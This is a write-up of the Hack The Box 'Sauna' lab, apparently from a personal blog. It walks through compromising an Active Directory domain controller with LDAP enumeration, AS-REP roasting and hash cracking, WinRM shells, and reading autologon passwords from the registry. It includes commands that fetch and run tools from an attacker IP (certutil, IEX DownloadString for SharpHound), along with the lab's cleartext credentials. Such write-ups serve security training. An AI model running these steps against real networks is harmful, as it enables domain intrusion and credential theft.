htb-sauna-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Tue Feb 18 03:17:50 2020 as: nmap -A -oN allports 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.076s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-02-18 16:19:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=2/18%Time=5E4B9DC1%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 8h01m51s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-02-18T16:22:19
|_ start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 100.30 ms 10.10.16.1
2 100.29 ms 10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 18 03:23:06 2020 -- 1 IP address (1 host up) scanned in 317.70 seconds

The most interesting ports open were: HTTP(80), Kerberos(88) and Win-RM (5985) .

User
I enumerated the Ldap port:
A lot of information was returned, but the most interesting part was:

root@kali:~/htb/sauna# ldapsearch -h 10.10.10.175 -p 389 -x -b "dc=EGOTISTICAL-BANK,dc=LOCAL" > ldaplogall.txt
root@kali:~/htb/sauna# ls
allports ldaplogall.txt

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL

Now we have a possible username: “ Hugo Smith ”.
If you try to ASREPRoast that user you will find that it doesn’t exist. So I tried variations of the name and found one that was indeed a valid user: hsmith .
Variations I tried:

Hugo Smith
HugoSmith
hugo.smith
h.smith
hsmith
smithh
smith.h
smith.hugo
smithhugo
smith hugo

Found user:

root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/ -usersfile hugosmith.txt
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax

So, now we have a valid user “ hsmith ” but no password…
It’s time to take a look to the web server. In there you will only find a few html pages, some
of them contains interesting names:

So, that we know the format that is being used to create the usernames, let’s check this usernames:

fsmith
scoins
sdriver
btaylor
hbear

We found that the user “ fsmith ” is vulnerable to ASREProast and we have obtained the crackable “hash”.

root@kali:~/htb/sauna# GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.LOCAL/FSmith
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for FSmith
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:cb52c62c6143cf4cc4c71dccf64756f5$d216f5b0ae6326c1a3027dd19f3976e5a8259a5a1c4118f7f61da536f069ac63b15d65498c22399ff1d985819c280dbda2b88236429eaf03d4b1e25b7ba49323a378e4854c3e0b26b6ec7bb4c5245651e32ffb84025e34d9b05db659e80f2b510ccfcb3e0274b13fff13b6e650a987cb2d73f8288239ca15f7aa19e0914f48e5ccfe49af81e1aaf2f3864ed48ebe21e8f32258eeedcf7924022213178f4175dafd77b97dae029dbf57648cafd31769624759538c9f56a92cbf3bb52af1c19488fc633abedb85df88b6297cd921006a2e0706f20ae5a05d5091feeee6870ff014496e38ba7b397d90e4a42bb46940b2cecda70ac4de67dd1ed817028f37cbe46b

So, let’s crack it with john and rockyou:

c:\PENTEST\HASHCAT>hashcat32.exe -m 18200 -a 0 -w 3 EGOTISTICAL-BANK.hash e:\pentest\rockyou.txt --force
hashcat (v5.1.0) starting...
did not work for me 

root@kali:~/htb/sauna# john ego.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:33 DONE (2020-02-18 04:48) 0.02995g/s 315720p/s 315720c/s 315720C/s Thines..Theredwolf_120691
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Credentials found: fsmith:Thestrokes23
Now, just connect via Win-RM and grab the user flag:

root@kali/opt/evil-winrm# ruby evil-winrm.rb -u fsmith -p "Thestrokes23" -i EGOTISTICAL-BANK.LOCAL

*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf
*Evil-WinRM* PS C:\Users\FSmith\desktop> certutil -urlcache -split -f http://10.10.14.10/WINPEAS.exe C:\Users\FSmith\Documents\WINPEAS.exe

Root

I started enumerating the box using winPEAS

*Evil-WinRM* PS C:\Users\FSmith\Documents> ./winpeas.exe systeminfo userinfo
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
- Getting Win32_UserAccount info...
--snip--


  [+] RDP Sessions(T1087&T1033)
    Not Found

  [+] Ever logged users(T1087&T1033)
  [X] Exception: System.Management.ManagementException: Access denied 
   at System.Management.ThreadDispatch.Start()
   at System.Management.ManagementScope.Initialize()
   at System.Management.ManagementObjectSearcher.Initialize()
   at System.Management.ManagementObjectSearcher.Get()
   at winPEAS.UserInfo.GetEverLoggedUsers()
    Not Found

  [+] Looking for AutoLogon credentials(T1012)
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

or it can be done manually

*Evil-WinRM* PS C:\Users\FSmith\Documents> REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ EGOTISTICALBANK
DefaultUserName REG_SZ EGOTISTICALBANK\svc_loanmanager
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ 
LegalNoticeText REG_SZ 
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x8e3982368
ShutdownFlags REG_DWORD 0x80000027
DisableLockWorkstation REG_DWORD 0x0
DefaultPassword REG_SZ Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey
*Evil-WinRM* PS C:\Users\FSmith\Documents>

It found some interesting credentials inside the Winlogon registry:

There isn’t any user called “ svc_loanmanager ” but there is one called “ svc_loanmgr ” svc_loanmgr : Moneymakestheworldgoround!
And you can connect to it with the password extracted from the registry:

You can also use Sharphound to enumerate the Domain and you will find that the user svc_loanmgr has permissions to execute DCSync against the DC:

root@kali:/opt/evil-winrm# ruby evil-winrm.rb -u svc_loanmgr -p "Moneymakestheworldgoround!" -i EGOTISTICAL-BANK.LOCAL

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> powershell -command "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.70/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Verbose -LdapUSer 'svc_loanmgr' -LdapPass 'Moneymakestheworldgoround!'"
Initializing BloodHound at 5:42 PM on 2/18/2020
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Building GUID Cache
Starting Enumeration for EGOTISTICAL-BANK.LOCAL
Adding Network Credential to connection
Waiting for enumeration threads to finish
Found usable Domain Controller for EGOTISTICAL-BANK.LOCAL : SAUNA.EGOTISTICAL-BANK.LOCAL
Status: 60 objects enumerated (+60 ì/s --- Using 83 MB RAM )
Finished enumeration for EGOTISTICAL-BANK.LOCAL in 00:00:00.4511238
0 hosts failed ping. 0 hosts timedout.
Waiting for writer thread to finish

Compressing data to C:\Users\svc_loanmgr\Documents\20200218174244_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200218174244_BloodHound.zip
Info: Downloading 20200218174244_BloodHound.zip to 20200218174244_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> exit
Info: Exiting with code 0
root@kali:/opt/evil-winrm#

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *